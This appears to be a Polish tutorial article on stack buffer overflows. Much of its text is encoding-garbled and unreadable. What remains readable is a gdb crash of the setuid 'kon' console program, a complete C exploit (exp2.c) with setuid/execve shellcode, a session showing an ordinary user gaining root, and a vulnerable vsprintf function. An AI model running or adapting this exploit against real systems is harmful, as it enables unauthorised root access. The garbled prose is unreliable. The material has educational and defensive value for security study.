ÈÊÉAËzÌ8ÍÎÃÏÐ5Ë=ÑLÒLÓÔË\Õ|ÕÕÖ×|Ø5ÏÐ5ËLÎÓ&ÙÓÚÎMÛÜ5ËLÝÔËLÞ5ß]à5ÍLáÐ5ÍãâÍ"Þ5Ëz×ËËÉÕÕÕ
3. Real
ä
Ü×åLàØ'â'æ"ÎÛçÉæ"×+ÍÒXÒËLà8ÍÏÒÛ5èâ'Í
ÞéáÓ;ßÎÍVáuÜ×+ÍÝzÍÒÜ=×+Í"Ý$ÑLÒLÓÆÝPÛÎêËLÜ×Ëë×+Í"ÎËÝ$ÍÌ8Ó&æÎÄì=íÉAÍ"Þ5ËLÝzÍ"ÌÛÎ
Ü=×+Ëë×ÍÎæÎSà5ßÑÒÓ;æ]Þ5ËLÌ.ì
ä
ÉÍÌ8ÑÍ×ÑËÝ(ËNâæáÉ2ËÌ(Ó0ÌZáQÉAÍÙ&ËÝ(ÍÌÛ$ÝÊÝ(Ó&æÙ0ØÑÛZáQÉ×Ûà=Ø5Ï|â'ÍÏÐzÒÜ5Í"×+ÍÎæÉ×+æ"ÎîáuØ8Ó&Ñì
ï
ÌZðË×ÎVÍÏâ'ß
Ë
ÑLÒLÓØ×Òæ
Ý
Þ5ËÌ8Ó&æ
Ü5ËÒ"ÛZáQÞ5ÍÙ&ÓÚÎMÛ
Ü=×Òæë=Ù;ñÑÍâñÏ
Ù&ÓáQÉAß
òó5ôõö÷ø
(
http://securityfocus.com/advisories/5434
ùúãû\üýuþÿ8ü&ÿ
ü
ö+÷
&ü
ó
ÿÿ
ö
þÿ5ÿ8ü
ó=öó
!
÷
ü
÷
"
ö
ôLö+÷
þ#
$
-
%'&()*,+-$.)0/&(214365"78(9:1;*,):<=3>(#?:@+)A1BC+D@2EF<*2GCHJIK&MLN7OP<PQC*-) <R3STOU7V
GW<SRGX1Y7VZ(&STOP9:)QCE[U\(2&]L^*-) &ST_2@-`F)ab*,143dc1BC(OD):<=3
&2(/,&DL[) <Y(#*,)Fc2@,e4&BfO"(21R3g<hSd):ijE):<"kl(#?:@+#&,QTknmDoo-H
p
/2BRq#c2@g36<EUNL[) iY7rOP(2<c2@,+#&DL1Y7r_&*,1ts=9)uSCGX)*+wvxyH
Listing 5. Debugowanie kon’a.
root@localhost:~# gdb kon
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-slackware-linux"...(no debugging symbols
found)...
(gdb) r -Coding `perl -e 'print "A"x800'`
Starting program: /usr/bin/kon -Coding `perl -e 'print "A"x800'`
Kanji ON Console ver.0.3.9 (2000/04/09)
KON> video type VGA' selected
KON> hardware scroll mode.
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info reg eip
eip 0x41414141 0x41414141
(gdb) quit
Voila!
z{1EwUFc<YO/&,QCBR<"(*-) 5|_&#*#GuBC&9:i^*,1Y(~}0t,z{&a"<YE[UF/B=OU-SCG5/,) k|OY*qDLZ(2&/,)WST1*,):1N</-9 &)G@KH2 U2E
BR1OP<E@2aYUg3g<E[U{3<
STO"7OP<b)**<43EF<G&(DUL^U2_&#B=OU-SCG1*,) 1c?Wi"(@hG:U/2@][Htz{<GW&(21G1LU2_,&B=OU-SCG@g3<
LwSC_,1*-)_,),OE.) <**#U7YV~QCBC&2(2&LN)WSC_&LU,7VKH^&DGW&LU[LtU+29u5
gK=:W R¡=¢£[¤#¥y
Listing 6. exp2.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <getopt.h>
#define PATH "/usr/bin/kon"
#define BUFS 800
/* ...::: -=[ www.pi3.int.pl ]=- :::... */
char shellcode[] = "\x31\xdb\x31\xc0\x31\xd2\xb2\x2d\x6a\x0a\x68\x3a"
"\x2e\x2e\x2e\x68\x2d\x20\x3a\x3a\x68\x6c\x20\x5d"
"\x3d\x68\x6e\x74\x2e\x70\x68\x69\x33\x2e\x69\x68"
"\x77\x77\x2e\x70\x68\x3d\x5b\x20\x77\x68\x3a\x3a"
"\x20\x2d\x68\x2e\x2e\x2e\x3a\x89\xe1\xb0\x04\xcd"
"\x80"
/* setuid(0) */
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80"
/* setgid(0) */
"\x31\xdb\x89\xd8\xb0\x2e\xcd\x80"
/* exec /bin/sh */
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd"
"\x80"
/* exit(0) */
"\x31\xdb\x89\xd8\xb0\x01\xcd\x80";
long ret_ad(char *a1, char *a2) {
return (0xbffffffa-strlen(a1)-strlen(a2));
}
int ussage(char *arg) {
printf("\n\t...::: -=[ exploit for Kon version 0.3.9b-16 (by pi3) ]=- :::...\n");
printf("\n\tUssage:\n\t[+] %s [options]\n
-? <this help screen>
-o <offset>
-p PATH\n\n",arg);
exit(-1);
}
int main(int argc, char *argv[]) {
long ret,*buf_addr;
char *buf,*path=PATH;
static char *sh[]={shellcode,NULL};
int i,opt,offset=0;
FILE *fp;
while((opt = getopt(argc,argv,"p:o:?")) != -1) {
switch(opt) {
case 'o':
offset=atoi(optarg);
break;
case 'p':
path=optarg;
break;
case '?':
default:
ussage(argv[0]);
break;
}
}
if ( (fp=fopen(path,"r"))==NULL) {
printf("\n*\tI can\'t open path to victim! - %s\t*\n\n",path);
ussage(argv[0]);
} fclose(fp);
if (!(buf=(char*)malloc(BUFS))) {
printf("\nI can\'t locate memory! - buf\n");
exit(-1);
}
printf("\n\t...::: -=[ exploit for Kon version 0.3.9b-16 (by pi3) ]=- :::...\n");
printf("\n\t[+] Bulding buffors!\n");
ret=ret_ad(shellcode,path);
ret+=offset;
printf("\t[+] Using adres 0x%x\n",ret);
buf_addr=(long*)buf;
for(i=0;i<BUFS;i+=4) {
*(buf_addr) = ret; buf_addr++;
}
printf("\nExecuting the vuln program - %s\n\n",path);
execle(path,path,"-Coding", buf, 0, sh);
return 0;
}
¦§¨,©ª«,¬=©#C®0¨2¯W°X±ª²"³´Pµu¶·,©2³§¸2±¹g§Y¨©§CºD«2»¶¸2¯N³¼ §8½R§Y¾P¼:µ¿½|¶Pº#©{·2R©ºDR§Y»w«-®tÀR¯X§R§4¹;Àdµ:²8ª#±{ª2±2Á^©#¸
½[µ ¶"¼u©¨R©D¯u¸,©ÂyÃ"µ Ä8Åƽµ:¶"¼¿¨©ÂyÇÀÈÁW©D½N§ÉwµA³©2³§=¹.³©¸,µ:¶"º#©F¹6¶Y³2¶Y¸Êª§4¹y¯X®Ë¨2¯W°X±ª,²Y³#´Dµ ¶Ì´P§·,µWÀT§Y¸#±Ê´Y¸,§¨-µ ¶»
NULL ('\
ÍÎ
ÉyÏPÐK=´"¶¯X¶PÀC¯«g¹d»[±[½µ ²"ø,§PÀT´"¶Yº#©¨©#¸§2Ñ
$ whoami
user
$ ls –alh /usr/bin/kon
-rwsr-xr-x 1 root root 45k Jul 5 20:57 /usr/bin/kon*
$ cc exp2.c -o exp2
$ ./exp2
...
KON> video type VGA' selected
KON> hardware scroll mode.
...::: -=[
www.pi3.int.pl
]=- :::…
# whoami
root
#
ÒNÓÔ:Õ:ÖØ×ÙÚÖYÛ#ÜPÔ:ÖÝÖÝWÓ]ÞFÖÞßáàCÓ2ÓDâ=ãCäåDÕ:Õ Öæ×=×=×çgÖèné[Ô Û2ÖPêbÞ~åâÓ2ÛÖlÖâWÖè,ÓDéÖë-Ô:ÖíìàRÓ2îàRÖÞ~ï]Ülì2à=Üßè2ÝÖPÛïZÖ
ìàRÖéÛÜPÔ¿é|åPî#Óì2àCÓ2îDàRÖÞ~ïãCï,ÔuÛ2Óé|åPî#Óë,Ô ðYÜß2ÞãyÔ ñNë,Ô å|àCòóë-ÔÈ×-ô à=ÜPåõ,Öâuß,Õè,ÓÜYë,Ö"Õ åöPêNÓ2Û#ìÓéÔ åPÛë-Ô ÷|ÓøRÔ:ÖàCñ"ù
è2âWòàRÖÞ~Öï-ãCâWÖéÔ:Ó#ë#ß>ÖâWàXß2õï2ëÖâÚãÈï-Ô Û2Öúôûà=ÜPåõÖýügåYÛ#ëÖYèFï-þ4é[Ô ÖPÛ2Ó#ÞFÔ ê|éNÖÞFùÿÔóNë,Ô:å^é
ãTÜß-ãÈâuè,Ô:åÛÜPÔ¿ï2àXß>ÛÖ=üg÷
ÛÓãÈâWñìwõ#ßõåÜYì,ÓþRàÈåYÛë-Ô ÓNÜYÞFÔuåë,Ô:êôËù2Ó#àRÖÜtë,Ô åéãTÜß-ãÈâuè,ÔuårÛÜÔï2àXßãT÷ÞFÓóÕ:ÔéåtÛÓ^éßèÓà4Üß-ãÈâWÖë-Ô:Ö
(exploitowania).
Ó~Û2ÓwâWå4üAÞ~åâÓ2Ûß,ùè2âòàC÷tïóß,ÕuÔuþCÞwß~éhâ:ß2Þ
ìà=Üß2èÝÖ"Û#ÜPÔ åDùâÓwàRò#óë,Ô
ãdÔ:ñ|Óë,ÖâuàRÓãTÜè,ñNÓ2Û[ìÓìà=Ü"åPÛë-Ô å=üù,î#ÛDßó
ë-Ô åïóß#éÖ"Õ:ÔWþRÞßÌé|ðPÖ"Õ åÔ ë-ãRâWà=ï2è,ð=ü
ÔÔ
âàCÖ"ø4ÔuÕuÔuþÈÞ[ßé
ìÓ#ì2àRÖé^ë2ß;Ö"ÛàRåDãtÜ"Öwì,Ô:åàXéwãCÜßÞ
àRÖÜDåÞÌúæôÓ^ü6åDãCâ
é|ÝÖPþÈë,Ô å>ÜDÖ"Õ åâW÷Ìî#ÛDßMï2ÞÔ åþÈð"Ô Þ[ßãCä,åPÕuÕ ð"ÓÛ2åé
ÜYÞÔ:åë2ë2ßðYäÊþCàCÓ2Û2ÓéÔãÈè,ÓDétß-ðäÿúóßÝåÞ
àRòéë-Ô:åó;Ôë2ë,å"î2Ó
ãTäåPÕ:Õ:ð"Ó2Ûï-ùÚÖ"ÕuåàRÓ#õ,Ô
ÓëâXÓãdÖÞÓ8ðPÓ;ì,Óìà=ÜPå"Ûë,Ô:åÜFâuß2Þ
ÜPÖDãCâà=Ü"åóPåë,Ô åYÞFùÚÔ ó>Û2ÓÛ2ÖÝWåÞ
éãTäåPÕ:Õ:ð"Ó2ÛÜDÔ:åFõ2ß
é^ß-þ4é[Ô åâÕ Ö
Ý Ó#ëÕuÔë2è.ÛÓ[ÞFÓyüå=ütãÈâuàRÓ#ë#ßÈú¿ú ú
-=[
www.pi3.int.pl
]=-
:ú úúCù-ÓàRÖYÜ^ëÖ[ãTÖYÞ\èÓ#ë,ÔuåYð|Û2ÓÛ2ÖYÝåÞ
ÔëØãCâà=ï2è,ð4ü6ñFå-Ô¿âù
è2âò#àRÖ.ãyÔuñwéß2è,Óë,ÖFî#ÛDß2õ2ß8ðYÓþrõ2ß2ÝÓ>ë,ÔuåâÖèÌÜ>ãCäåDÕ:Õ ðPÓ2ÛåÞ
np
ú,âWàRÖ"øRÔ:ÕuÔ¿õ#ß-þÈÞ[ßé
þRàRÓÛ2åYè
ë-Ô å"î2ÓûÔé^ß2èÓ#ë#ß#éNÖÝWÓõ#ßãyÔ ñrë
ie to co powinno –
âÖè,Ô årÞ~ÖYÝåÜPÖõåYÜì-Ô å"ðÜ"åYë,Ô å2ú
=DNR F]HQLH
"!$#%'&()#*,+.- / 0%21-+32%&%5467896;:<$#>=?! '@AA8:BA!9#>C/(:4D"+B:<%E1/F$/,&(G"+;H&(IJ/(4D%21/D-+;/,1)+7A=CK#91&(8
2/L E@AA8=8M2%5NO"$EP-$Q:R0C!$#%C=SS0/1,#@""! %21,/T/,1+;A!9#@A)%A!$#K- /&,@AE)6$/(-$#/)4UA!$#V@A)%1/$P&/WL,9X3/(+Y$Z
oznac
2[:</ Z\#>]^:R_XR!, @YNO[=S/(]2%^L,8 `M4F+;"])0#a4Ucb
np
d
1&)8e/,1)+;!$#@AE%"!$#%[- QA:B0#fNg%)67:U0#@"L ["! " H(44
h"i;j)k,lSm"n o2pm_hqn$pm^rUpm2s*t u vxwqy,k9z3u(iYk{x|
P
u(} hA~Ji3len hq((p>k,i;[rr'k( zR~J} ,m2h"lVu(n9pmc<} m"n$m^hE( pJxuiB
lVu(2n h52n h2sm"2w\} uUh2i;mExm"l
http://www.securityfocus.com/archive/1/338436
):
int SockPrintf(FILE *sockfp, char *format,...)
{
va_list ap;
char buf[32768];
va_start(ap, format);
vsprintf(buf, format, ap);
va_end(ap);
return SockWrite(buf, 1, strlen(buf), sockfp);
}
Ep>ki;hArDhzBk,n,t$o3Oh uoAt,i7p>n,~Om)7~ sh~Bmju p>ek"rDhzRk,nt o;Op$},i7p*n~Bzt,~R(i7hn$pm},i;h"rFEhoEp2j(k
h"i;j)k,lSm"n~<(r},iYEmAouOmE~lVu(EsJparDm},i3)mA} m"n9pmAn9pm5yk$z3ui;h|Cpm(;~RmA~Ch"t,k,i7h~ r~,l¡},i3,} h2(t,kU~<h\()p>k,ih
n9pmfOm)7~lKu)sp>rDh',ur,t ui3A9~<hn$ph,|EurpEom35p>n$zYu(i3lVhEo3Op u, ,Jh"l¢u
} m"n$mjuUhE($pxuiB|
k,2uct u(lVmAi7oAg£n m2jucu(}i;u,j)i7hAlSu)rDh"n9phWt ui3A9~<hWW~<mEoA¤,n$usuj,pp
Open Source. Niektóre bugi jednak
lVu,jVy wCy$hAi;Eu},i;u$7~Rur',tiB~<mV} u(}i32m"VAr't,JmC}i3EmA~<mE~<u)rUhAn9pmCKy h"i;()uM(k$j,p>l} hAi7hAlSm~i7m"l¥u
t$hAEm3,u 7~R"},n mY¦u} o3p },i7u,j)i;hlCk|(§(kg£i3",l"n$hAn$mn h"l¨$m
gmentation fault zdebugujcie program
i napiszcie exploita ;).
©
n$zYu(i3lVho;gm
u
n$h3£n u)rA oA¤
u,t,iB,~ o¤
y,k$jho¤
x
u ~<A}n m
n h
spvxo2pm
y,k j)~i7h2ª
(
http://securityfocus.com/archive/1
«x¬CF®A¯2°(±³² ®µ´R¶¸·¹Jº7´R¶µ»S¼(¯E½¡º£¹¶¾
®A¿9¹Jºx®2À,¬CÁ¼)´<¼(ÂD½Ã½"Ä¿9·¼¹>´±ÅºxÆ
Ç;È
²9¹½A¯D²$®´R½3É·¹ÊËE¹½'¾2®»V¹½(º7¾)ËA¾2®² ½EÌ ®E·½'´<¼K¼ÂD¹½2·½
Ç
¾E®°(¾(¹½3ÉE¬2Í®3É"ÊY¹½"¯(º¾2½F½"Ä¿9·¼¹a´J±C»V¼(¯2² ®'¾²$®2·½Î2À²$®
stronie packetstorm (
http://www.packetstormsecurity.nl
).
5. Bibliografia
http://phrack.org/show.php?p=49&a=14
http://www.pi3.int.pl